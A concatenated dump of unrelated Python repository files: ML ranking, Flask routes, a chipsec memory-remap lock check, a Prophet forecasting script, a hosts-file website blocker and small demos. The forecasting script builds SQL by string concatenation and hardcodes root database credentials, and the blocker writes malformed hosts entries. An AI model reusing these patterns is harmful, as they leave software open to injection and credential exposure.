#split_idx = 0\n #for idx, funcId in enumerate(rank):\n # if compFuncIdCost[funcId] < lower_bound:\n # split_idx = idx\n # break\n # top_rank.append(funcId)\n\n ## print(\"top rank:\")\n ## for funcId in top_rank:\n ## print(funcId, compFuncIdCost[funcId])\n #new_top_rank = sorted(top_rank, key=compFuncIdCost.get)\n ## print(\"rank:\")\n #for funcId in new_top_rank:\n # print(funcId, compFuncIdCost[funcId])\n #for funcId in rank[split_idx:]:\n # print(funcId, compFuncIdCost[funcId])\n\ndef main():\n complexity_file_path = sys.argv[1]\n with open(\"callgraph.log\") as infile:\n callgraph = gen_callgraph(infile)\n with open(\"funcIdCost.log\") as infile:\n funcIdCost = gen_funcIdCost(infile)\n with open(complexity_file_path) as infile:\n compFuncIds = gen_most_complexity(infile)\n gen_rank(callgraph, funcIdCost, compFuncIds)\n\n\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"ComAirProject/ComAir","sub_path":"Code/scripts/ranking/gen_rank.py","file_name":"gen_rank.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"72797633322","text":"from sklearn.svm import LinearSVC\nfrom collections import OrderedDict\nfrom operator import itemgetter\nfrom evaluation import compute_wss\n\ndef prioritise_and_evaluate(X_train,\n y_train,\n X_test,\n y_test):\n \"\"\"\n Trains an L2-regularised linear SVM classifier.\n Documents in the test subset, i.e. X_test, are ranked according to the signed-margin distance between the document feature vectors and the SVM hyperplane.\n :param X_train: Training documents\n :param y_train: Training labels\n :param X_test: Test documents\n :param y_test: Test labels\n :return: work saved over sampling at 95%recall (wss_95) and 100%recall (wss_100)\n \"\"\"\n # define SVM Classifier\n linear_svc = LinearSVC(loss='squared_hinge', penalty='l2',\n dual=False, tol=1e-3, class_weight='balanced', C=0.000001)\n # train SVM classifier\n linear_svc.fit(X_train, y_train)\n\n # get predictions of test documents\n predictions = linear_svc.predict(X_test)\n\n # get distances between test documents and the SVM hyperplane.\n distances = linear_svc.decision_function(X_test)\n test_indexes_with_distances = {}\n for index, prediction in enumerate(predictions):\n test_indexes_with_distances[index] = distances[index]\n\n # order documents in a descending order of their distance to the SVM hyperplane\n test_indexes_with_distances = OrderedDict(\n sorted(test_indexes_with_distances.items(), key=itemgetter(1), reverse=True))\n\n\n # evaluate ranking in terms of work saved over 95% and 100% recall\n wss_95, wss_100 = compute_wss(indexes_with_predicted_distances=test_indexes_with_distances,\n y_test=y_test)\n return wss_95, wss_100","repo_name":"gkontonatsios/DAE-FF","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"1588219492","text":"\nimport sys, os, logging, PyQt4\nfrom logging import debug, info, warning, error, critical\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\n\n# --------------------------------------\n\nclass Config(dict):\n \n def __init__(self, rootdir):\n self.initDefaultKeys()\n self.loadAllKeys()\n if (not rootdir is None) and os.path.isdir(rootdir):\n self[\"rootdirectory\"] = rootdir\n debug(\"arg rootdirectory: %s\" % rootdir)\n return\n\n def __getattr__(self, key):\n return self[key]\n def __setattr__(self, key, value):\n self[key]=value\n\n def initDefaultKeys(self):\n info(\"Initializing default keys\")\n defaults = ( ( \"rootdirectory\", \"~/\" ),\n ( \"window/xpos\", \"0\" ),\n ( \"window/ypos\", \"0\" ),\n ( \"window/xsize\", \"250\" ),\n ( \"window/ysize\", \"150\" ) )\n for i in defaults:\n self[ i[0] ] = i[1]\n debug(\"[%s]=%s\"%(i[0], self[i[0]]))\n # default handlers\n self.handlers = [ [\"*.nes\",\"fceu\"] ]\n return\n\n def loadAllKeys(self):\n settings = QSettings()\n info(\"Loading keys from config file: %s\" % settings.fileName())\n settings.sync()\n keys = settings.allKeys()\n for i in keys:\n s = str(i)\n if s.find(\"handlers\") >= 0: continue # skip handlers\n self[s] = settings.value(i).toString()\n debug(\"[%s]=%s\"%(s, self[s]))\n self.loadHandlers(settings)\n return\n\n def loadHandlers(self, settings):\n h = []\n n = settings.beginReadArray(\"handlers\");\n if n == 0: return\n info(\"Loading %i handlers\" % n)\n for i in xrange(0, n):\n settings.setArrayIndex(i);\n glob = str(settings.value(\"glob\").toString())\n launcher = str(settings.value(\"launcher\").toString())\n h.append( [glob, launcher] )\n debug(\"[handlers][%i] = glob:%s : launcher:%s\" % (i, h[i][0], h[i][1]) )\n self.handlers = h\n settings.endArray()\n return\n\n def saveAllKeys(self):\n settings = QSettings()\n info(\"Saving keys to config file: %s\" % settings.fileName())\n for i in self:\n s = str(self[i])\n if i == \"handlers\": continue # skip handlers\n settings.setValue(i, s)\n debug(\"[%s]=%s\"%(i, s))\n self.saveHandlers(settings)\n settings.sync()\n return\n\n def saveHandlers(self, settings):\n h = self.handlers\n if len(h) == 0: return\n info(\"Saving %i handlers\" % len(h))\n settings.beginWriteArray(\"handlers\", len(h))\n for i in xrange(0, len(h)):\n settings.setArrayIndex(i)\n settings.setValue(\"glob\", h[i][0])\n settings.setValue(\"launcher\", h[i][1])\n debug(\"[handlers][%i] = glob:%s : launcher:%s\" % (i, h[i][0], h[i][1]) )\n settings.endArray()\n return\n\n","repo_name":"inmatarian/qhtpicker","sub_path":"qhtpicker/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"11689427560","text":"from flask import render_template, request, redirect\nfrom flask import Blueprint\nfrom models.album import Album\nimport repositories.album_repository as album_repository\nimport repositories.artist_repository as artist_repository\n\nalbums_blueprint = Blueprint(\"albums\", __name__)\n\n@albums_blueprint.route(\"/\")\ndef homepage():\n albums = album_repository.select_all()\n total_albums_in_stock = album_repository.total_albums_in_stock(albums)\n total_spend_on_stock = album_repository.total_spend_on_stock(albums)\n stock_alerts = False\n for album in albums:\n if album.stock_qty <= 3:\n stock_alerts = True\n break\n return render_template(\"/index.html\", albums = albums, total_albums_in_stock = total_albums_in_stock, total_spend_on_stock = total_spend_on_stock, stock_alerts = stock_alerts)\n\n@albums_blueprint.route(\"/albums\")\ndef albums():\n albums = album_repository.select_all()\n return render_template(\"albums/index.html\", albums = albums)\n\n@albums_blueprint.route(\"/albums/new\")\ndef new_album():\n artists = artist_repository.select_all()\n return render_template(\"/albums/new.html\", artists = artists)\n\n@albums_blueprint.route(\"/albums\", methods=[\"POST\"])\ndef create_album():\n artist = artist_repository.select(request.form[\"artist.id\"])\n title = request.form[\"title\"]\n year_released = request.form[\"year_released\"]\n genre = request.form[\"genre\"]\n stock_qty = int(request.form[\"stock_qty\"])\n purchase_price = float(request.form[\"purchase_price\"])\n sell_price = float(request.form[\"sell_price\"])\n album = Album(artist, title, year_released, genre, stock_qty, purchase_price, sell_price)\n album_repository.save(album)\n return redirect(\"/albums\")\n\n@albums_blueprint.route(\"/albums/\", methods = [\"GET\"])\ndef show_album(id):\n album = album_repository.select(id)\n return render_template(\"albums/album.html\", album = album)\n\n@albums_blueprint.route(\"/albums//edit\")\ndef edit_album(id):\n album = album_repository.select(id)\n artists = artist_repository.select_all()\n return render_template(\"albums/edit.html\", album = album, artists = artists)\n\n@albums_blueprint.route(\"/albums/\", methods=[\"POST\"])\ndef update_album(id):\n artist = artist_repository.select(request.form[\"artist.id\"])\n title = request.form[\"title\"]\n year_released = request.form[\"year_released\"]\n genre = request.form[\"genre\"]\n stock_qty = int(request.form[\"stock_qty\"])\n purchase_price = float(request.form[\"purchase_price\"])\n sell_price = float(request.form[\"sell_price\"])\n album = Album(artist, title, year_released, genre, stock_qty, purchase_price, sell_price, id)\n album_repository.update(album)\n return redirect(\"/albums\")\n\n@albums_blueprint.route(\"/albums//delete\", methods=[\"POST\"])\ndef delete_album(id):\n album_repository.delete(id)\n return redirect (\"/albums\")\n","repo_name":"LaurenLingham/record_store","sub_path":"controllers/album_controller.py","file_name":"album_controller.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"2179231150","text":"import bingo_add\npeople=100\nsum=0\nfor i in range(1000):\n\tsum+=bingo_add.bingo(people)\n\nstring_num=str((sum/1000.0))\n\nprint (\"Meso oros arithmon mexri to BINGO :\")+string_num\n\n","repo_name":"milosmatic1513/Python-Projects","sub_path":"bingo_ergasia1/bingo.py","file_name":"bingo.py","file_ext":"py","file_size_in_byte":175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32440450784","text":"from django.test import TestCase\nimport pytest\nfrom .serializers import ProfileSerializer\nfrom .models import Profile\nimport logging\n\n@pytest.mark.django_db\ndef test_profile_serializer():\n # Create a test profile object\n profile = Profile.objects.create(\n name='John Doe',\n bio='Test bio',\n skills='Test skills',\n work_experience='Test work experience',\n hobbies='Test hobbies'\n )\n\n # Serialize the profile object\n serializer = ProfileSerializer(instance=profile)\n logging.info('This is an serializer ', serializer)\n # Ensure the serialized data matches the expected values\n assert serializer.data['name'] == 'John Doe'\n assert serializer.data['bio'] == 'Test bio'\n assert serializer.data['skills'] == 'Test skills'\n assert serializer.data['work_experience'] == 'Test work experience'\n assert serializer.data['hobbies'] == 'Test hobbies'\n\n","repo_name":"raghulvuedata/djangoPortfolio","sub_path":"portfolio/profiles/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70388977323","text":"from prettytable import PrettyTable\r\n\r\n#with open(\"C:\\\\Users\\\\USER\\\\error_message.csv\",\"r\")as csvfile:\r\n #csvf=csvfile.readlines()\r\n #lines=csvf[0]\r\n #newline=lines.split(\",\")\r\n #s=PrettyTable([newline[0],newline[1]])\r\n #for r in range(1,len(csvf)):\r\n #rr=csvf[r].split(\",\")\r\n #s.add_row([rr[0],rr[1]])\r\n #html_code=s.get_html_string()\r\n #html_file=open(\"C:\\\\Users\\\\USER\\\\html_script.html\",\"w\")\r\n #html_file=html_file.write(html_code)\r\n\r\n\r\nwith open(\"C:\\\\Users\\\\USER\\\\user_statistics.csv\",\"r\") as usercsv:\r\n us=usercsv.readlines()\r\n line=us[0]\r\n lines=line.split(\",\")\r\n D=PrettyTable([lines[0] ,lines[1] ,lines[2]])\r\n for e in range(1,len(us)):\r\n new=us[e].split(\",\")\r\n D.add_row([new[0],new[1],new[2]])\r\n stats_html_code=D.get_html_string()\r\n stats_file=open(\"C:\\\\Users\\\\USER\\\\user_statistics.html\",\"w\")\r\n stats_file=stats_file.write(stats_html_code)","repo_name":"EmperorDa8/random-scripts","sub_path":"csv to html.py","file_name":"csv to html.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"72191022124","text":"import pandas as pd\nfrom fbprophet import Prophet\nimport numpy as np\nimport pyodbc\nimport os\n\n\ndef forecasting():\n restaurant_id = input('geben sie eine RestaurantID an:')\n name_csv = str(input('geben sie den Namen der Zieldatei an: (z.B. restaurant.csv)'))\n column_date = str(input('Name der Spalte mit dem Datum:'))\n column_product_name = str(input('Name der Spalte mit den Produktnamen:'))\n column_quantity = str(input('Name der Spalte mit der Quantity:'))\n column_sold_products = str(input('Name der Spalte mit der Anzahl der verkauften Produkte:'))\n data_path = \"../data\"\n data = pd.read_csv(os.path.join(data_path, name_csv))\n\n data_ts = data[[column_date, column_product_name, column_quantity, column_sold_products]]\n data_ts = data_ts.dropna()\n\n # change to datetime\n data_ts[column_date] = pd.to_datetime(data_ts[column_date])\n data_ts[column_date] = pd.to_datetime(data_ts[column_date], format='%Y%m%d')\n\n data_grouped = data_ts.groupby([column_product_name])[column_sold_products, column_quantity].sum()\n # data_grouped.tail(100)\n\n # get the top 10 most sold products\n top_ten = data_grouped.sort_values(by=str(column_sold_products), ascending=False).head(10)\n top_ten_list = top_ten.index.tolist()\n\n # connect to Database\n connection_string = (\n 'DRIVER=MySQL ODBC 8.0 ANSI Driver;'\n 'SERVER=localhost;'\n 'DATABASE=restaurant_products;'\n 'UID=root;'\n 'PWD=1234;'\n 'charset=utf8mb4;'\n )\n\n conn = pyodbc.connect(connection_string)\n\n def execute(command):\n cursor = conn.cursor()\n cursor.execute(command)\n cursor.commit()\n\n # inserts the forecasting into the database\n def predict(restaurantID, date, quantity, min_quantity, max_quantity, item):\n command = 'insert into prediction (restaurantId,datum,quantity,max_quantity,min_quantity, product_name) values (\"' + str(\n restaurantID) + '\", \"' + str(date) + '\",' + str(quantity) + ',' + str(min_quantity) + ',' + str(\n max_quantity) + ',\"' + str(item) + '\");'\n # print(command)\n execute(command)\n\n for item in top_ten_list:\n is_item = data_ts[column_product_name] == item\n data_item = data_ts[is_item]\n data_item[column_date] = pd.to_datetime(data_item[column_date].dt.strftime('%Y-%m-%d'))\n data_item_grouped = data_item.groupby([column_date])[column_sold_products].sum()\n date = data_item_grouped.index.tolist()\n df_data_item_grouped = data_item_grouped.to_frame()\n # print(date)\n df_data_item_grouped['Datum'] = date\n # data_item_grouped['Order Date'] = data_item_grouped.index\n df_data_item_grouped.reset_index(drop=True, inplace=True)\n\n df_data_item_grouped.rename(columns={'Datum': 'ds', column_sold_products: 'y'}, inplace=True)\n list = df_data_item_grouped['y']\n df_data_item_grouped.pop('y')\n df_data_item_grouped['y'] = list\n\n m = Prophet()\n m.fit(df_data_item_grouped)\n\n future_week = m.make_future_dataframe(periods=7)\n future_week.tail(7)\n\n forecast_week = m.predict(future_week)\n\n print(forecast_week[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail(7))\n\n prediction_seven_days_df = forecast_week[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail(7)\n\n for index, rows in prediction_seven_days_df.iterrows():\n date = rows['ds']\n quantity = rows['yhat']\n min_quantity = rows['yhat_lower']\n max_quantity = rows['yhat_upper']\n\n predict(restaurant_id, date, quantity, max_quantity, min_quantity, item)\n\n\nforecasting()\n","repo_name":"BennerLukas/takeawaste","sub_path":"test/deprecated/forecasting_function.py","file_name":"forecasting_function.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"2085557282","text":"from chipsec.module_common import BaseModule, ModuleResult, MTAG_HWCONFIG, MTAG_SMM\nfrom chipsec.defines import BIT32, ALIGNED_1MB\n\n_MODULE_NAME = 'remap'\n\nTAGS = [MTAG_SMM, MTAG_HWCONFIG]\n\n\n_REMAP_ADDR_MASK = 0x7FFFF00000\n_TOLUD_MASK = 0xFFFFF000\n\n\nclass remap(BaseModule):\n\n def __init__(self):\n BaseModule.__init__(self)\n self.rc_res = ModuleResult(0x43aa254, 'https://chipsec.github.io/modules/chipsec.modules.common.remap.html')\n\n def is_supported(self) -> bool:\n if self.cs.is_core():\n rbase_exist = self.cs.is_register_defined('PCI0.0.0_REMAPBASE')\n rlimit_exist = self.cs.is_register_defined('PCI0.0.0_REMAPLIMIT')\n touud_exist = self.cs.is_register_defined('PCI0.0.0_TOUUD')\n tolud_exist = self.cs.is_register_defined('PCI0.0.0_TOLUD')\n tseg_exist = self.cs.is_register_defined('PCI0.0.0_TSEGMB')\n if rbase_exist and rlimit_exist and touud_exist and tolud_exist and tseg_exist:\n return True\n self.logger.log_important('Required register definitions not defined for platform. Skipping module.')\n else:\n self.logger.log_important('Not a Core (client) platform. Skipping module.')\n\n self.rc_res.setStatusBit(self.rc_res.status.NOT_APPLICABLE)\n self.res = self.rc_res.getReturnCode(ModuleResult.NOTAPPLICABLE)\n return False\n\n def is_ibecc_enabled(self) -> bool:\n if self.cs.is_register_defined('IBECC_ACTIVATE'):\n edsr = self.cs.read_register_field('IBECC_ACTIVATE', 'IBECC_EN')\n if edsr == 1:\n return True\n else:\n self.logger.log_verbose('IBECC is not enabled!')\n else:\n self.logger.log_verbose('IBECC is not defined!')\n return False\n\n def check_remap_config(self) -> int:\n is_warning = False\n\n remapbase = self.cs.read_register('PCI0.0.0_REMAPBASE')\n remaplimit = self.cs.read_register('PCI0.0.0_REMAPLIMIT')\n touud = self.cs.read_register('PCI0.0.0_TOUUD')\n tolud = self.cs.read_register('PCI0.0.0_TOLUD')\n tsegmb = self.cs.read_register('PCI0.0.0_TSEGMB')\n self.logger.log(\"[*] Registers:\")\n self.logger.log(f\"[*] TOUUD : 0x{touud:016X}\")\n self.logger.log(f\"[*] REMAPLIMIT: 0x{remaplimit:016X}\")\n self.logger.log(f\"[*] REMAPBASE : 0x{remapbase:016X}\")\n self.logger.log(f\"[*] TOLUD : 0x{tolud:08X}\")\n self.logger.log(f\"[*] TSEGMB : 0x{tsegmb:08X}\")\n self.logger.log(\"\")\n\n ia_untrusted = 0\n if self.cs.register_has_field('MSR_BIOS_DONE', 'IA_UNTRUSTED'):\n ia_untrusted = self.cs.read_register_field('MSR_BIOS_DONE', 'IA_UNTRUSTED')\n remapbase_lock = remapbase & 0x1\n remaplimit_lock = remaplimit & 0x1\n touud_lock = touud & 0x1\n tolud_lock = tolud & 0x1\n remapbase &= _REMAP_ADDR_MASK\n remaplimit &= _REMAP_ADDR_MASK\n touud &= _REMAP_ADDR_MASK\n tolud &= _TOLUD_MASK\n tsegmb &= _TOLUD_MASK\n self.logger.log(\"[*] Memory Map:\")\n self.logger.log(f\"[*] Top Of Upper Memory: 0x{touud:016X}\")\n self.logger.log(f\"[*] Remap Limit Address: 0x{(remaplimit | 0xFFFFF):016X}\")\n self.logger.log(f\"[*] Remap Base Address : 0x{remapbase:016X}\")\n self.logger.log(f\"[*] 4GB : 0x{BIT32:016X}\")\n self.logger.log(f\"[*] Top Of Low Memory : 0x{tolud:016X}\")\n self.logger.log(f\"[*] TSEG (SMRAM) Base : 0x{tsegmb:016X}\")\n self.logger.log('')\n\n remap_ok = True\n\n self.logger.log(\"[*] Checking memory remap configuration..\")\n\n if remapbase == remaplimit:\n self.logger.log(\"[!] Memory Remap status is Unknown\")\n is_warning = True\n elif remapbase > remaplimit:\n self.logger.log(\"[*] Memory Remap is disabled\")\n else:\n self.logger.log(\"[*] Memory Remap is enabled\")\n remaplimit_addr = (remaplimit | 0xFFFFF)\n if self.is_ibecc_enabled():\n ok = (remaplimit_addr > touud) and (remapbase < touud)\n else:\n ok = ((remaplimit_addr + 1) == touud)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" Remap window configuration is correct: REMAPBASE <= REMAPLIMIT < TOUUD\")\n else:\n self.logger.log_bad(\" Remap window configuration is not correct\")\n\n ok = (0 == tolud & ALIGNED_1MB) and \\\n (0 == touud & ALIGNED_1MB) and \\\n (0 == remapbase & ALIGNED_1MB) and \\\n (0 == remaplimit & ALIGNED_1MB)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" All addresses are 1MB aligned\")\n else:\n self.logger.log_bad(\" Not all addresses are 1MB aligned\")\n\n self.logger.log(\"[*] Checking if memory remap configuration is locked..\")\n ok = (0 != touud_lock) or (0 != ia_untrusted)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" TOUUD is locked\")\n else:\n self.logger.log_bad(\" TOUUD is not locked\")\n\n ok = (0 != tolud_lock) or (0 != ia_untrusted)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" TOLUD is locked\")\n else:\n self.logger.log_bad(\" TOLUD is not locked\")\n\n ok = ((0 != remapbase_lock) and (0 != remaplimit_lock)) or (0 != ia_untrusted)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" REMAPBASE and REMAPLIMIT are locked\")\n else:\n self.logger.log_bad(\" REMAPBASE and REMAPLIMIT are not locked\")\n\n if remap_ok:\n if is_warning:\n self.logger.log_warning(\"Most Memory Remap registers are configured correctly and locked\")\n self.logger.log(\"[!] Manual verification of REMAP BASE and LIMIT register values may be needed.\")\n res = ModuleResult.WARNING\n self.rc_res.setStatusBit(self.rc_res.status.VERIFY)\n else:\n res = ModuleResult.PASSED\n self.rc_res.setStatusBit(self.rc_res.status.SUCCESS)\n self.logger.log_passed(\"Memory Remap is configured correctly and locked\")\n else:\n res = ModuleResult.FAILED\n self.rc_res.setStatusBit(self.rc_res.status.CONFIGURATION)\n self.rc_res.setStatusBit(self.rc_res.status.LOCKS)\n self.logger.log_failed(\"Memory Remap is not properly configured/locked. Remaping attack may be possible\")\n\n return self.rc_res.getReturnCode(res)\n\n\n # --------------------------------------------------------------------------\n # run( module_argv )\n # Required function: run here all tests from this module\n # --------------------------------------------------------------------------\n def run(self, _) -> int:\n self.logger.start_test(\"Memory Remapping Configuration\")\n\n self.res = self.check_remap_config()\n return self.res\n","repo_name":"chipsec/chipsec","sub_path":"chipsec/modules/common/remap.py","file_name":"remap.py","file_ext":"py","file_size_in_byte":7083,"program_lang":"python","lang":"en","doc_type":"code","stars":2755,"dataset":"github-code","pt":"19"} +{"seq_id":"43580235744","text":"class BitmapFile:\n def __init__(self, data):\n self.size = self.sumBytes(data[2:6])\n self.start = self.sumBytes(data[10:14])\n self.width = self.sumBytes(data[18:22])\n self.height = self.sumBytes(data[22:26])\n self.depth = self.sumBytes(data[28:30])\n self.bpp = self.depth // 8\n #self.head = data[0:self.start]\n #self.data = data[self.start:self.size]\n self.data = data\n\n def sumBytes(self, d):\n byteSum = 0\n for i in range(len(d)):\n byteSum += (\n (d[i] % 16) * 16**(i*2) +\n (d[i] // 16) * 16**(i*2 + 1)\n )\n return byteSum\n\n def makeFile(self, filePath):\n with open(filePath, \"wb\") as f:\n f.write(self.data)\n\n def findPixelIndex(self, x, y):\n return self.start + x * self.bpp + y * self.width * self.bpp\n","repo_name":"borkess/afis","sub_path":"BitmapFile.py","file_name":"BitmapFile.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31300617090","text":"import time\nfrom datetime import datetime as dt\n\nhosts_path = r\"C:\\Users\\Vishnu's World\\Desktop\\app3\\hosts\"\nredirect = \"127.0.0.1\"\nwebsite_list = [\"www.facebook.com\",\"facebook.com\",\"www.flipkart.com\",\"www.amazon.in\"]\n\nwhile True:\n if dt(dt.now().year,dt.now().month,dt.now().day,9)>dt.now()>=dt(dt.now().year,dt.now().month,dt.now().day,3):\n print (\"College...\")\n with open(hosts_path,'r+')as file:\n content = file.read()\n for website in website_list:\n if website in content:\n pass\n else:\n file.write(redirect+\"\"+website)\n else:\n with open(hosts_path,'r+') as file:\n content = file.readlines()\n file.seek(0)\n for line in content:\n if not any(website in content for website in website_list):\n file.write(line)\n file.truncate()\n print (\"study...\")\n time.sleep (5)\n","repo_name":"vishnuvryeruva/Website-Blocker","sub_path":"Website_blocker.pyw","file_name":"Website_blocker.pyw","file_ext":"pyw","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2485307424","text":"import time\nimport matplotlib.pyplot as plt\nfrom typing import Callable\n\nfrom myio import getRandomMatrix\n\n\ndef benchmark(mul_func: Callable, sizes: list) -> list:\n res_times = []\n temp_times = []\n const_measures = 2\n\n for i in range(len(sizes)):\n left_matrix = getRandomMatrix(sizes[i], sizes[i])\n right_matrix = getRandomMatrix(sizes[i], sizes[i])\n for j in range(const_measures):\n start_time = time.time()\n mul_func(left_matrix, right_matrix)\n end_time = time.time() - start_time\n\n temp_times.append(end_time)\n\n res_times.append(sum(temp_times) / const_measures)\n temp_times.clear()\n\n print(res_times)\n\n return res_times\n\n\ndef plot_graph(mul_funcs: list, sizes: list) -> None:\n # General settings\n plt.title(\"Сложность алгоритмов умножения матриц\")\n plt.xlabel(\"Размер\")\n plt.ylabel(\"Время, сек\")\n plt.grid()\n\n # Collecting values\n for mul_func in mul_funcs:\n times = benchmark(mul_func, sizes)\n mul_name = str(mul_func).split()[1]\n if mul_name == \"defaultMatrixMul\":\n mul_name = \"Простой\"\n elif mul_name == \"vinMatrixMul\":\n mul_name = \"Виноград\"\n elif mul_name == \"optimizedVinMatrixMul\":\n mul_name = \"Виноград с оптимизациями\"\n plt.plot(sizes, times, label=mul_name)\n\n # Image of the results obtained\n plt.legend()\n plt.show()","repo_name":"Untouchabl3Pineapple/iu7-aa","sub_path":"lab_02/src/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"73023939244","text":"#!/usr/bin/env/python\n# -*- coding: utf-8 -*-\n\nfrom Tkinter import * #importa a bibioteca do TKinter\n\ndef donothing():\n print ('IT WORKED')\n\nroot = Tk() #cria a aplicação raiz. \nroot.title(string=\"..:: CALCULADORA ::..\")\n\nframe1 = Frame(root)\n#frame1.pack(side=TOP, fill=X)\nframe1.grid()\n\nframe2 = Frame(root)\n#frame2.pack(side=RIGHT, fill=X)\nframe2.grid()\nmainmenu = Menu(frame1)\nroot.config(menu=mainmenu)\n\nsubmenu=Menu(mainmenu)\nmainmenu.add_cascade(label='File',menu=submenu)\nsubmenu.add_command(label='Open', command=donothing)\nsubmenu.add_separator()\nsubmenu.add_command(label='Exit', command=frame1.quit)\n\n\nw = Label(frame1, text=\"Teste TKinter!\") #cria um label com o texto especificado\n#w.pack()\nw.grid(column=0,row=0) #insere na tela\nbtn = Button(frame1, text=\"Olá\", cursor=\"hand2\")\n#btn.pack()\nbtn.grid(column=0,row=1)\nbtn2 = Button(frame2, text=\"Hello\", cursor=\"umbrella\")\n#btn2.pack()\nbtn2.grid(column=0,row=0)\nbtn3 = Button(frame2, text=\"Hallo\", cursor=\"sailboat\")\n#btn3.pack()\nbtn3.grid(column=1,row=0)\n#from Tkinter import ttk\n#ttk.Button(root, text=\"Hello World\").grid() #Cria botão\nroot.mainloop() #inicializa o loop","repo_name":"brunocozendey/100DaysChallenge","sub_path":"python/tkinter-teste.py","file_name":"tkinter-teste.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37196489068","text":"#! /usr/bin/env python3\r\n# coding: utf-8\r\n\r\n\"\"\"This script starts mc Guyver labyrinth\r\nparameter is :\r\n file_name (discribing map).\"\"\"\r\nfrom core.gamemanager import DisplayManager\r\nfrom core.mapgame import MapGame\r\nfrom core import utils\r\nfrom core import constant\r\nfrom tkinter import messagebox, Tk\r\nimport logging as lg\r\n\r\nlogger = lg.getLogger(__name__)\r\n\r\nMODULE_DAL_PATH = 'core/dal'\r\n\r\n\r\ndef main():\r\n \"\"\"Main entry no parameter.\"\"\"\r\n args = utils.parse_arguments()\r\n # prepare les logs\r\n utils.set_logger()\r\n # lit le fichier map\r\n map_game = MapGame(args.datafile)\r\n lg.info('Map description loaded: %s', map_game.path_name)\r\n interface_type = args.interface\r\n lg.info('Display interface : %s', args.interface)\r\n\r\n # implementation Text or Graphic\r\n display = utils.build_display(MODULE_DAL_PATH, interface_type)\r\n\r\n # get Pygame windows\r\n fenetre = display.init(map_game)\r\n lg.info('%s env set : %s', args.interface, map_game.path_name)\r\n\r\n # set display manager : intialize items and persos\r\n game_manager = DisplayManager(display, fenetre, map_game)\r\n\r\n # dispatch item and perso (mcGyver, guard, needle, ether, tube)\r\n game_manager.dispatch_items()\r\n lg.info('Dispatch items set')\r\n\r\n # main loop\r\n continuer = 1\r\n\r\n while continuer:\r\n\r\n game_manager.draw()\r\n\r\n for event in display.event_get():\r\n # Boucle event\r\n if event is None:\r\n continue\r\n\r\n if display.event_quit(event) is True:\r\n continuer = 0\r\n elif display.event_keydown_escape(event) is True:\r\n continuer = 0\r\n elif display.event_keydown_right(event) is True:\r\n game_manager.move_items(constant.ID_MCGYVER, 'droite')\r\n elif display.event_keydown_left(event) is True:\r\n game_manager.move_items(constant.ID_MCGYVER, 'gauche')\r\n elif display.event_keydown_up(event) is True:\r\n game_manager.move_items(constant.ID_MCGYVER, 'haut')\r\n elif display.event_keydown_down(event) is True:\r\n game_manager.move_items(constant.ID_MCGYVER, 'bas')\r\n\r\n # check items\r\n if game_manager.compare_pos(constant.ID_MCGYVER,\r\n constant.ID_GARDIEN):\r\n lg.info('On rencontre le garde ')\r\n if game_manager.is_completed():\r\n game_manager.exclude_item(constant.ID_GARDIEN, 4)\r\n lg.info('Ok Garde endormi ')\r\n else:\r\n lg.info('You loose !')\r\n Tk().wm_withdraw()\r\n messagebox.showinfo('Oups', 'You loose !')\r\n continuer = 0\r\n\r\n elif game_manager.compare_pos(constant.ID_MCGYVER,\r\n constant.ID_AIGUILLE):\r\n lg.info('On rencontre l\\'aiguille ')\r\n game_manager.collect_item(constant.ID_AIGUILLE)\r\n game_manager.exclude_item(constant.ID_AIGUILLE, 0)\r\n\r\n elif game_manager.compare_pos(constant.ID_MCGYVER,\r\n constant.ID_ETHER):\r\n lg.info('On rencontre la bouteille d\\'ether ')\r\n game_manager.collect_item(constant.ID_ETHER)\r\n game_manager.exclude_item(constant.ID_ETHER, 1)\r\n\r\n elif game_manager.compare_pos(constant.ID_MCGYVER,\r\n constant.ID_TUBE):\r\n lg.info('On rencontre le tube ')\r\n game_manager.collect_item(constant.ID_TUBE)\r\n game_manager.exclude_item(constant.ID_TUBE, 2)\r\n\r\n elif game_manager.is_exit(constant.ID_MCGYVER):\r\n if game_manager.is_completed():\r\n lg.info('You win !')\r\n # on redessine une derniere fois la fenetre du jeu\r\n game_manager.draw()\r\n Tk().wm_withdraw()\r\n messagebox.showinfo('Congratulations', 'You win !')\r\n continuer = 0\r\n\r\n\r\nif __name__ == \"__main__\":\r\n 